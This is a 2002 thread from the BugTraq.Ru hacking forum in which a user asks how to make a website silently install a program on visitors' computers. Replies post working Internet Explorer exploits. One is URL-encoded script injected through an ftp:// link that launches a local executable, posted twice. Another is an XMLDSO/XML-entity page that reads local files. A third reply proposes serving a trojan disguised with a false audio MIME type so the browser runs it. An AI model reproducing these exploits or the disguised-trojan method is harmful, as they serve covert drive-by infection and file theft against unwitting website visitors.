BugTraq.Ru: форум / hacking / Запуск любой программы / выполнение любой команды (IE)

информационная безопасность
без паники и всерьез

подробно о проекте

Все любят мед

Где водятся OGRы

Страшный баг в Windows

BugTraq.Ru

Анализ криптографических сетевых...

Модель надежности двухузлового...

Специальные марковские модели надежности...

Очередное исследование 19 миллиардов...

Оптимизация ввода-вывода как инструмент...

Зловреды выбирают Lisp и Delphi

библиотека

о проекте

bugtraq.ru / форум / hacking

Имя

Пароль

если вы видите этот текст, отключите в настройках форума использование JavaScript


ФОРУМ


	все доски
	FAQ
	IRC
	новые сообщения

	site updates
	guestbook
	beginners
	sysadmin
	programming
	operating systems
	theory
	web building
	software
	hardware
	networking
	law
	hacking
gadgets
job
dnet
humor
miscellaneous
scrap

регистрация

Легенда:

новое сообщение

закрытая нитка

новое сообщение

в закрытой нитке

старое сообщение

Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания.
Новичкам также крайне полезно ознакомиться с данным документом.

Запуск любой программы / выполнение любой команды (IE) 06.09.02 14:10 Число просмотров: 1459
Автор: FreeHermit Статус: Незарегистрированный пользователь

<"чистая" ссылка>

Создай этот html и загрузи... выбери какая у тебя OS, после этого загрузиться notepad.exe...

<head>
<title>test</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
</head>
<body>
<p>
<a href="ftp://%22%3e%3cscript%3e%73%65%74%54%69%6d%65%6f%75%74%28%66%75%6e%63%74%69%6f%6e%28%29%7b%64%6f%63%75%6d%65%6e%74%2e%62%6f%64%79%2e%69%6e%6e%65%72%48%54%4d%4c%3d%27%3c%6f%62%6a%65%63%74%20%63%6c%61%73%73%69%64%3d%22%63%6c%73%69%64%3a%31%31%31%31%31%31%31%31%2d%31%31%31%31%2d%31%31%31%31%2d%31%31%31%31%2d%31%31%31%31%31%31%31%31%31%31%31%31%22%20%20%63%6f%64%65%62%61%73%65%3d%22%66%69%6c%65%3a%2f%2f%63%3a%2f%77%69%6e%6e%74%2f%6e%6f%74%65%70%61%64%2e%65%78%65%22%3e%3c%2f%6f%62%6a%65%63%74%3e%27%7d%2c%20%32%30%30%29%3b%3c%2fscript%3e%20" target="_blank">
C:/Winnt/notepad.exe Windows NT/2000/XP)
</a>.
<br />
<a href="ftp://%22%3e%3cscript%3e%73%65%74%54%69%6d%65%6f%75%74%28%66%75%6e%63%74%69%6f%6e%28%29%7b%64%6f%63%75%6d%65%6e%74%2e%62%6f%64%79%2e%69%6e%6e%65%72%48%54%4d%4c%3d%27%3c%6f%62%6a%65%63%74%20%63%6c%61%73%73%69%64%3d%22%63%6c%73%69%64%3a%31%31%31%31%31%31%31%31%2d%31%31%31%31%2d%31%31%31%31%2d%31%31%31%31%2d%31%31%31%31%31%31%31%31%31%31%31%31%22%20%20%63%6f%64%65%62%61%73%65%3d%22%66%69%6c%65%3a%2f%2f%63%3a%2f%77%69%6e%64%6f%77%73%2f%6e%6f%74%65%70%61%64%2e%65%78%65%22%3e%3c%2f%6f%62%6a%65%63%74%3e%27%7d%2c%20%32%30%30%29%3b%3c%2fscript%3e%20" target="_blank">
C:/Windows/notepad.exe (Windows 9x)
</a>
</p>
</body>

Internet Explorer 04.09.02 23:47
Автор: litl Статус: Незарегистрированный пользователь

<"чистая" ссылка>

Привет всем.
Возможно ли сделать такую вещь: Когда посетитель заходит на сайт ему автоматически без его ведома скачивается программа, конечно же он не должен видеть как это происходит.
Или это просто миф.

Запуск любой программы / выполнение любой команды (IE) 06.09.02 14:10
Автор: FreeHermit Статус: Незарегистрированный пользователь

<"чистая" ссылка>

Создай этот html и загрузи... выбери какая у тебя OS, после этого загрузиться notepad.exe...

<head>
<title>test</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
</head>
<body>
<p>
<a href="ftp://%22%3e%3cscript%3e%73%65%74%54%69%6d%65%6f%75%74%28%66%75%6e%63%74%69%6f%6e%28%29%7b%64%6f%63%75%6d%65%6e%74%2e%62%6f%64%79%2e%69%6e%6e%65%72%48%54%4d%4c%3d%27%3c%6f%62%6a%65%63%74%20%63%6c%61%73%73%69%64%3d%22%63%6c%73%69%64%3a%31%31%31%31%31%31%31%31%2d%31%31%31%31%2d%31%31%31%31%2d%31%31%31%31%2d%31%31%31%31%31%31%31%31%31%31%31%31%22%20%20%63%6f%64%65%62%61%73%65%3d%22%66%69%6c%65%3a%2f%2f%63%3a%2f%77%69%6e%6e%74%2f%6e%6f%74%65%70%61%64%2e%65%78%65%22%3e%3c%2f%6f%62%6a%65%63%74%3e%27%7d%2c%20%32%30%30%29%3b%3c%2fscript%3e%20" target="_blank">
C:/Winnt/notepad.exe Windows NT/2000/XP)
</a>.
<br />
<a href="ftp://%22%3e%3cscript%3e%73%65%74%54%69%6d%65%6f%75%74%28%66%75%6e%63%74%69%6f%6e%28%29%7b%64%6f%63%75%6d%65%6e%74%2e%62%6f%64%79%2e%69%6e%6e%65%72%48%54%4d%4c%3d%27%3c%6f%62%6a%65%63%74%20%63%6c%61%73%73%69%64%3d%22%63%6c%73%69%64%3a%31%31%31%31%31%31%31%31%2d%31%31%31%31%2d%31%31%31%31%2d%31%31%31%31%2d%31%31%31%31%31%31%31%31%31%31%31%31%22%20%20%63%6f%64%65%62%61%73%65%3d%22%66%69%6c%65%3a%2f%2f%63%3a%2f%77%69%6e%64%6f%77%73%2f%6e%6f%74%65%70%61%64%2e%65%78%65%22%3e%3c%2f%6f%62%6a%65%63%74%3e%27%7d%2c%20%32%30%30%29%3b%3c%2fscript%3e%20" target="_blank">
C:/Windows/notepad.exe (Windows 9x)
</a>
</p>
</body>

Держи реализацию для IE 06.09.02 13:41
Автор: FreeHermit Статус: Незарегистрированный пользователь

<"чистая" ссылка>

---[ Чтение любого файла (IE)
Создай на диске C: файл test.txt

<html>
<head>
<base href="file:///C:/">
</head>
<body>
<applet code="com.ms.xml.dso.XMLDSO.class" width="0" height="0" id="xmldso" MAYSCRIPT="true">
<?xml version="1.0"?>
<!DOCTYPE file [
<!ELEMENT file (#PCDATA) >
<!ENTITY contents SYSTEM "file:///C:/test.txt">
]>
<file>
&contents;
</file>
</applet>
<script language="javascript">
setTimeout("showIt()",2000);
function showIt() {
var jelmer = xmldso.getDocument();
alert(jelmer.Text);
}
</script>
</body>
</html>

---[ Запуск любых программ и выполнение команд
Вводить в строчке URL
-[ 9x:
ftp://"><script>setTimeout(function(){document.body.innerHTML='<object%20classid="clsid:11111111-1111-1111-1111-111111111111"%20%20codebase="file://c:/windows/notepad.exe"></object>'},%20200);</script>/

-[ NT/2000/XP:
ftp://"><script>setTimeout(function(){document.body.innerHTML='<object%20classid="clsid:11111111-1111-1111-1111-111111111111"%20%20codebase="file://c:/winnt/notepad.exe"></object>'},%20200);</script>/

Internet Explorer 05.09.02 00:46
Автор: Tamas Статус: Member

<"чистая" ссылка>

> Привет всем.
> Возможно ли сделать такую вещь: Когда посетитель заходит на
> сайт ему автоматически без его ведома скачивается
> программа, конечно же он не должен видеть как это
> происходит.
> Или это просто миф.

По идеи да что самое интересное
хотя сам не пробывал !!!
вобшем мысля такая
IE при скачки фаилов проверяет тип фаила по
HTTP заголовку а не по расширению
так что надо просто при передачи
фаилов в заголовке указать тип например audio/x-wav
а передавать напимер trojan.exe что привидёт
ктаму что IE подумает что это wav и отправит его на
выполнение в систему
для реализации это иддеи тибе понадобтся
собствиный HTTP сервер как минимум.

Internet Explorer 05.09.02 09:49
Автор: litl Статус: Незарегистрированный пользователь

<"чистая" ссылка>

> По идеи да что самое интересное
> хотя сам не пробывал !!!
> вобшем мысля такая
> IE при скачки фаилов проверяет тип фаила по
> HTTP заголовку а не по расширению
> так что надо просто при передачи
> фаилов в заголовке указать тип например audio/x-wav
> а передавать напимер trojan.exe что привидёт
> ктаму что IE подумает что это wav и отправит его на
> выполнение в систему
> для реализации это иддеи тибе понадобтся
> собствиный HTTP сервер как минимум.

Да это идея но надо я так понял скрипт писать или ещё что то в этом роде.
А как ти начём это сделать я незнаю. Не подскажешь.

1

Copyright © 2001-2025 Dmitry Leonov

Page build time: 0 s

Design: Vadim Derkach